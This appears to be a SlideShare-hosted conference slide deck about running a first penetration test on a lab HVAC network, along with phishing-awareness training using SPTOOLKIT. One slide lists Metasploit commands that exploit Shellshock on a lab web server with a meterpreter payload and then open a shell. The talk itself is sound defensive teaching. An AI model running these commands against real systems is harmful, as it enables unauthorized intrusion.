SlideShare a Scribd company logo
ANATOMY OF A PENTEST:
PROACTIVE STEPS TO ADDRESS
VULNERABILITIES IN YOUR NETWORK
Presenter: Robbie Corley
Robbie.Corley@KCTCS.EDU
Organization: KCTCS
Senior Information Security Analyst
Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
• Reverse Engineering / Studying Shellcode
• Finding and Exploiting Software Vulnerabilties
ABOUT ME
What is a pentest?
• A pentest is a simulated attack against a system to
prove or disprove the existence of vulnerabilities
previously detected by a vulnerability scan.
How does it work?
• You are the attacker:
• You will use exploits custom tailored to target
specific flagged vulnerabilities from your
previous vulnerability scan
LET’S TALK ABOUT PENTESTING
Some history on Pentesting…
• Pentesting originally required manually compiling each individual exploit
to test a vulnerability, all of which were usually coded in different
programming languages and specific to OS builds (XP sp1, XP sp2, etc)
What’s the advantage over a Vulnerability Scan and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your
network risk assessment
• A Pentest helps you fortify your network by discovering and
patching security holes before the attackers do and keeps your
auditors happy, which also keeps your boss happy 
• Pentesting “weeds out” false positives from a Vulnerability Scan
while also validating vulnerabilities
LET’S TALK ABOUT PENTESTING
• Our Goal: To Scan and Validate vulnerabilities in a simulated environment to
demonstrate the effectiveness of a Pentest
• Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus)
• Other recommendations: Tenable Nessus
• Open Source: OpenVAS
• Why Rapid7?
• Exploits are pre-compiled and you do not need to go online to search for them.
Readily available, built into the software
• Scanner and Pentesting software both free to try
• Software Resources Used:
• Nexpose Vulnerability Scan Solution
• Metasploit Pentesting Solution
CONDUCTING YOUR FIRST PENTEST
• Breakdown: Your boss has requested a blind vulnerability/pentest
assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
• A blind scan/pentest is when you scan/pentest a network without using
known credentials. This helps to mimic a realistic cyber attack scenario
•HVAC Network Layout:
• HVAC A: Windows XP for server HVAC software:
• 192.168.56.101
• HVAC B: Linux Web Server for HVAC Web Services
• 192.168.56.102
HVAC SYSTEM SCAN & PENTEST
SIMULATION
HVAC SERVER A: SCAN SIMULATION
Vulnerability Scan Results using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
HVAC SERVER A: PENTEST SIMULATION
Pentest Live Demo using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
HVAC SERVER B: SCAN SIMULATION
Vulnerability Scan Results using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
Shellshock!!!!!!
HVAC SERVER B: PENTEST SIMULATION
Pentest Live Demo using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
PENTEST SHELL COMMANDS USED
Commands used for future reference:
To pull up web console, type : Alt +Tilde “~”, then…
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec”
• “set RHOST 192.168.56.102” (our victim box ip address)
• “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module)
• “run”
Once in the compromised victim’s machine session, you can open a
shell by simply typing “shell”. You will then be greeted with a linux shell

• Why have User Awareness Training?
• Users can be more mindful of simple operations that can effectively
help keep their documents and data safe
• We simply cannot monitor all of our users’ actions
• Hacker’s are keen on well structured network security, and seek out
easier pathways of entry, i.e.: A phishing email directed to an
unsuspecting, un-training user
• On a personal note: Training gives our users a boost of confidence,
knowing they are collectively making a difference in keeping themselves
and the company more secure
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING MODULES
• How does it work?
• Phishing Modules use pre-made email templates
that resemble common Phishing emails in the wild
• Emails can be tailored to re-direct users to
informative phishing awareness videos upon the
user interacting with a phishing email
• What tools do I need?
• Easiest solution and what we will be using:
SPTOOLKIT
• SPTOOLKIT is Opensource and requires little
effort to setup
• Rapid7’s Metasploit Pentesting Software also
includes a Social Engineering module with a pro
license
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING PHISHING MODULES
• Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
• SMTP server
• Any Linux OS box with Apache and
MySQL installed
• Recommended approach: Install
Kali Linux which has Apache and
MySql installed and enabled by
default
• http://www.kali.org/downloads/
• Commands to start MYSQL and Apache:
• Service apache2 start
• Service mysql start
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
THAT’S ALL FOLKS
This presentation and its supplemental video and software content
can be downloaded by using the following link:
http://tinyurl.com/l46flvo (Secure Google-Drive repository)
Links to Resources outside of this repository:
SPTOOLKIT Setup Guide:
http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
www.rapid7.com -> download Community edition of Metasploit and Nexpose
http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting
environment and for SPTOOLKIT Social Engineering Module
Want to chat with me outside of this conference about more IT Security topics?
Shoot me an email at:
Robbie.Corley@kctcs.edu
QUESTIONS???

More Related Content

Similar to pentest

Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic ToolsAnalyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Ken Cenerelli
 
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Amazon Web Services
 
Open Audit
Open AuditOpen Audit
Open Audit
ncspa
 
Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5
FRSecure
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineLastline, Inc.
 
Exploiting XPC in AntiVirus
Exploiting XPC in AntiVirusExploiting XPC in AntiVirus
Exploiting XPC in AntiVirus
Csaba Fitzl
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
Rogue Wave Software
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT world
Rogue Wave Software
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Qualcomm Developer Network
 
Security in the Age of Open Source
Security in the Age of Open SourceSecurity in the Age of Open Source
Security in the Age of Open Source
Black Duck by Synopsys
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013drewz lin
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Neel Pathak
 
DevOps on AWS
DevOps on AWSDevOps on AWS
DevOps on AWS
Amazon Web Services
 
The Joy of Proactive Security
The Joy of Proactive SecurityThe Joy of Proactive Security
The Joy of Proactive Security
Andy Hoernecke
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
chap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systemschap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systems
KashfUlHuda1
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
dnomura
 
Create code confidence for better application security
Create code confidence for better application security Create code confidence for better application security
Create code confidence for better application security
Rogue Wave Software
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
Mike Spaulding
 

Similar to pentest (20)

Analyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic ToolsAnalyze Your Code With Visual Studio 2015 Diagnostic Tools
Analyze Your Code With Visual Studio 2015 Diagnostic Tools
 
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
Managing WorkSpaces at Scale | AWS Public Sector Summit 2016
 
Open Audit
Open AuditOpen Audit
Open Audit
 
Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5Slide Deck CISSP Class Session 5
Slide Deck CISSP Class Session 5
 
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja WarriorsRyan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
Ryan Elkins - Simple Security Defense to Thwart an Army of Cyber Ninja Warriors
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Exploiting XPC in AntiVirus
Exploiting XPC in AntiVirusExploiting XPC in AntiVirus
Exploiting XPC in AntiVirus
 
Cyber security - It starts with the embedded system
Cyber security - It starts with the embedded systemCyber security - It starts with the embedded system
Cyber security - It starts with the embedded system
 
Programming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT worldProgramming languages and techniques for today’s embedded andIoT world
Programming languages and techniques for today’s embedded andIoT world
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
 
Security in the Age of Open Source
Security in the Age of Open SourceSecurity in the Age of Open Source
Security in the Age of Open Source
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
DevOps on AWS
DevOps on AWSDevOps on AWS
DevOps on AWS
 
The Joy of Proactive Security
The Joy of Proactive SecurityThe Joy of Proactive Security
The Joy of Proactive Security
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
chap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systemschap-1 : Vulnerabilities in Information Systems
chap-1 : Vulnerabilities in Information Systems
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 
Create code confidence for better application security
Create code confidence for better application security Create code confidence for better application security
Create code confidence for better application security
 
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
BlackHat Presentation - Lies and Damn Lies: Getting past the Hype of Endpoint...
 

Recently uploaded

LIGA(E)11111111111111111111111111111111111111111.ppt
LIGA(E)11111111111111111111111111111111111111111.pptLIGA(E)11111111111111111111111111111111111111111.ppt
LIGA(E)11111111111111111111111111111111111111111.ppt
ssuser9bd3ba
 
Water Industry Process Automation and Control Monthly - May 2024.pdf
Water Industry Process Automation and Control Monthly - May 2024.pdfWater Industry Process Automation and Control Monthly - May 2024.pdf
Water Industry Process Automation and Control Monthly - May 2024.pdf
Water Industry Process Automation & Control
 
Event Management System Vb Net Project Report.pdf
Event Management System Vb Net  Project Report.pdfEvent Management System Vb Net  Project Report.pdf
Event Management System Vb Net Project Report.pdf
Kamal Acharya
 
road safety engineering r s e unit 3.pdf
road safety engineering  r s e unit 3.pdfroad safety engineering  r s e unit 3.pdf
road safety engineering r s e unit 3.pdf
VENKATESHvenky89705
 
ASME IX(9) 2007 Full Version .pdf
ASME IX(9)  2007 Full Version       .pdfASME IX(9)  2007 Full Version       .pdf
ASME IX(9) 2007 Full Version .pdf
AhmedHussein950959
 
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
Amil Baba Dawood bangali
 
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptxCFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
R&R Consult
 
Automobile Management System Project Report.pdf
Automobile Management System Project Report.pdfAutomobile Management System Project Report.pdf
Automobile Management System Project Report.pdf
Kamal Acharya
 
weather web application report.pdf
weather web application report.pdfweather web application report.pdf
weather web application report.pdf
Pratik Pawar
 
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
obonagu
 
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&BDesign and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Sreedhar Chowdam
 
block diagram and signal flow graph representation
block diagram and signal flow graph representationblock diagram and signal flow graph representation
block diagram and signal flow graph representation
Divya Somashekar
 
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdfAKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
SamSarthak3
 
Immunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary AttacksImmunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary Attacks
gerogepatton
 
Halogenation process of chemical process industries
Halogenation process of chemical process industriesHalogenation process of chemical process industries
Halogenation process of chemical process industries
MuhammadTufail242431
 
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
MdTanvirMahtab2
 
CME397 Surface Engineering- Professional Elective
CME397 Surface Engineering- Professional ElectiveCME397 Surface Engineering- Professional Elective
CME397 Surface Engineering- Professional Elective
karthi keyan
 
J.Yang, ICLR 2024, MLILAB, KAIST AI.pdf
J.Yang,  ICLR 2024, MLILAB, KAIST AI.pdfJ.Yang,  ICLR 2024, MLILAB, KAIST AI.pdf
J.Yang, ICLR 2024, MLILAB, KAIST AI.pdf
MLILAB
 
Cosmetic shop management system project report.pdf
Cosmetic shop management system project report.pdfCosmetic shop management system project report.pdf
Cosmetic shop management system project report.pdf
Kamal Acharya
 
Democratizing Fuzzing at Scale by Abhishek Arya
Democratizing Fuzzing at Scale by Abhishek AryaDemocratizing Fuzzing at Scale by Abhishek Arya
Democratizing Fuzzing at Scale by Abhishek Arya
abh.arya
 

Recently uploaded (20)

LIGA(E)11111111111111111111111111111111111111111.ppt
LIGA(E)11111111111111111111111111111111111111111.pptLIGA(E)11111111111111111111111111111111111111111.ppt
LIGA(E)11111111111111111111111111111111111111111.ppt
 
Water Industry Process Automation and Control Monthly - May 2024.pdf
Water Industry Process Automation and Control Monthly - May 2024.pdfWater Industry Process Automation and Control Monthly - May 2024.pdf
Water Industry Process Automation and Control Monthly - May 2024.pdf
 
Event Management System Vb Net Project Report.pdf
Event Management System Vb Net  Project Report.pdfEvent Management System Vb Net  Project Report.pdf
Event Management System Vb Net Project Report.pdf
 
road safety engineering r s e unit 3.pdf
road safety engineering  r s e unit 3.pdfroad safety engineering  r s e unit 3.pdf
road safety engineering r s e unit 3.pdf
 
ASME IX(9) 2007 Full Version .pdf
ASME IX(9)  2007 Full Version       .pdfASME IX(9)  2007 Full Version       .pdf
ASME IX(9) 2007 Full Version .pdf
 
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...
 
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptxCFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
CFD Simulation of By-pass Flow in a HRSG module by R&R Consult.pptx
 
Automobile Management System Project Report.pdf
Automobile Management System Project Report.pdfAutomobile Management System Project Report.pdf
Automobile Management System Project Report.pdf
 
weather web application report.pdf
weather web application report.pdfweather web application report.pdf
weather web application report.pdf
 
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
在线办理(ANU毕业证书)澳洲国立大学毕业证录取通知书一模一样
 
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&BDesign and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
 
block diagram and signal flow graph representation
block diagram and signal flow graph representationblock diagram and signal flow graph representation
block diagram and signal flow graph representation
 
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdfAKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
AKS UNIVERSITY Satna Final Year Project By OM Hardaha.pdf
 
Immunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary AttacksImmunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary Attacks
 
Halogenation process of chemical process industries
Halogenation process of chemical process industriesHalogenation process of chemical process industries
Halogenation process of chemical process industries
 
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
 
CME397 Surface Engineering- Professional Elective
CME397 Surface Engineering- Professional ElectiveCME397 Surface Engineering- Professional Elective
CME397 Surface Engineering- Professional Elective
 
J.Yang, ICLR 2024, MLILAB, KAIST AI.pdf
J.Yang,  ICLR 2024, MLILAB, KAIST AI.pdfJ.Yang,  ICLR 2024, MLILAB, KAIST AI.pdf
J.Yang, ICLR 2024, MLILAB, KAIST AI.pdf
 
Cosmetic shop management system project report.pdf
Cosmetic shop management system project report.pdfCosmetic shop management system project report.pdf
Cosmetic shop management system project report.pdf
 
Democratizing Fuzzing at Scale by Abhishek Arya
Democratizing Fuzzing at Scale by Abhishek AryaDemocratizing Fuzzing at Scale by Abhishek Arya
Democratizing Fuzzing at Scale by Abhishek Arya
 

pentest

  • 1. ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Robbie.Corley@KCTCS.EDU Organization: KCTCS Senior Information Security Analyst
  • 2. Personal Life / Interests • Married • Bachelor’s in Music Business??? • Favorite Show: Seinfeld • Favorite Movie(s): Lord of the Rings / Hobbit Trilogy • Favorite Aspects of IT Security: • Reverse Engineering / Studying Shellcode • Finding and Exploiting Software Vulnerabilties ABOUT ME
  • 3. What is a pentest? • A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? • You are the attacker: • You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan LET’S TALK ABOUT PENTESTING
  • 4. Some history on Pentesting… • Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? • A Vulnerability Scan merely lays out the foundation for your network risk assessment • A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy  • Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities LET’S TALK ABOUT PENTESTING
  • 5. • Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest • Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) • Other recommendations: Tenable Nessus • Open Source: OpenVAS • Why Rapid7? • Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software • Scanner and Pentesting software both free to try • Software Resources Used: • Nexpose Vulnerability Scan Solution • Metasploit Pentesting Solution CONDUCTING YOUR FIRST PENTEST
  • 6. • Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network • Attack Vectors used: Client Side and Web • A Blind Scan? • A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario •HVAC Network Layout: • HVAC A: Windows XP for server HVAC software: • 192.168.56.101 • HVAC B: Linux Web Server for HVAC Web Services • 192.168.56.102 HVAC SYSTEM SCAN & PENTEST SIMULATION
  • 7. HVAC SERVER A: SCAN SIMULATION Vulnerability Scan Results using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
  • 8. HVAC SERVER A: PENTEST SIMULATION Pentest Live Demo using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER
  • 9. HVAC SERVER B: SCAN SIMULATION Vulnerability Scan Results using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER Shellshock!!!!!!
  • 10. HVAC SERVER B: PENTEST SIMULATION Pentest Live Demo using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER
  • 11. PENTEST SHELL COMMANDS USED Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… • “use exploit/multi/http/apache_mod_cgi_bash_env_exec” • “set RHOST 192.168.56.102” (our victim box ip address) • “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) • “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) • “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell 
  • 12. • Why have User Awareness Training? • Users can be more mindful of simple operations that can effectively help keep their documents and data safe • We simply cannot monitor all of our users’ actions • Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing email directed to an unsuspecting, un-training user • On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING MODULES
  • 13. • How does it work? • Phishing Modules use pre-made email templates that resemble common Phishing emails in the wild • Emails can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing email • What tools do I need? • Easiest solution and what we will be using: SPTOOLKIT • SPTOOLKIT is Opensource and requires little effort to setup • Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES
  • 14. • Demo time! • Link: https://github.com/sptoolkit/sptoolkit • Requirements: • SMTP server • Any Linux OS box with Apache and MySQL installed • Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default • http://www.kali.org/downloads/ • Commands to start MYSQL and Apache: • Service apache2 start • Service mysql start USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
  • 15. USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT
  • 16. THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded by using the following link: http://tinyurl.com/l46flvo (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup www.rapid7.com -> download Community edition of Metasploit and Nexpose http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an email at: Robbie.Corley@kctcs.edu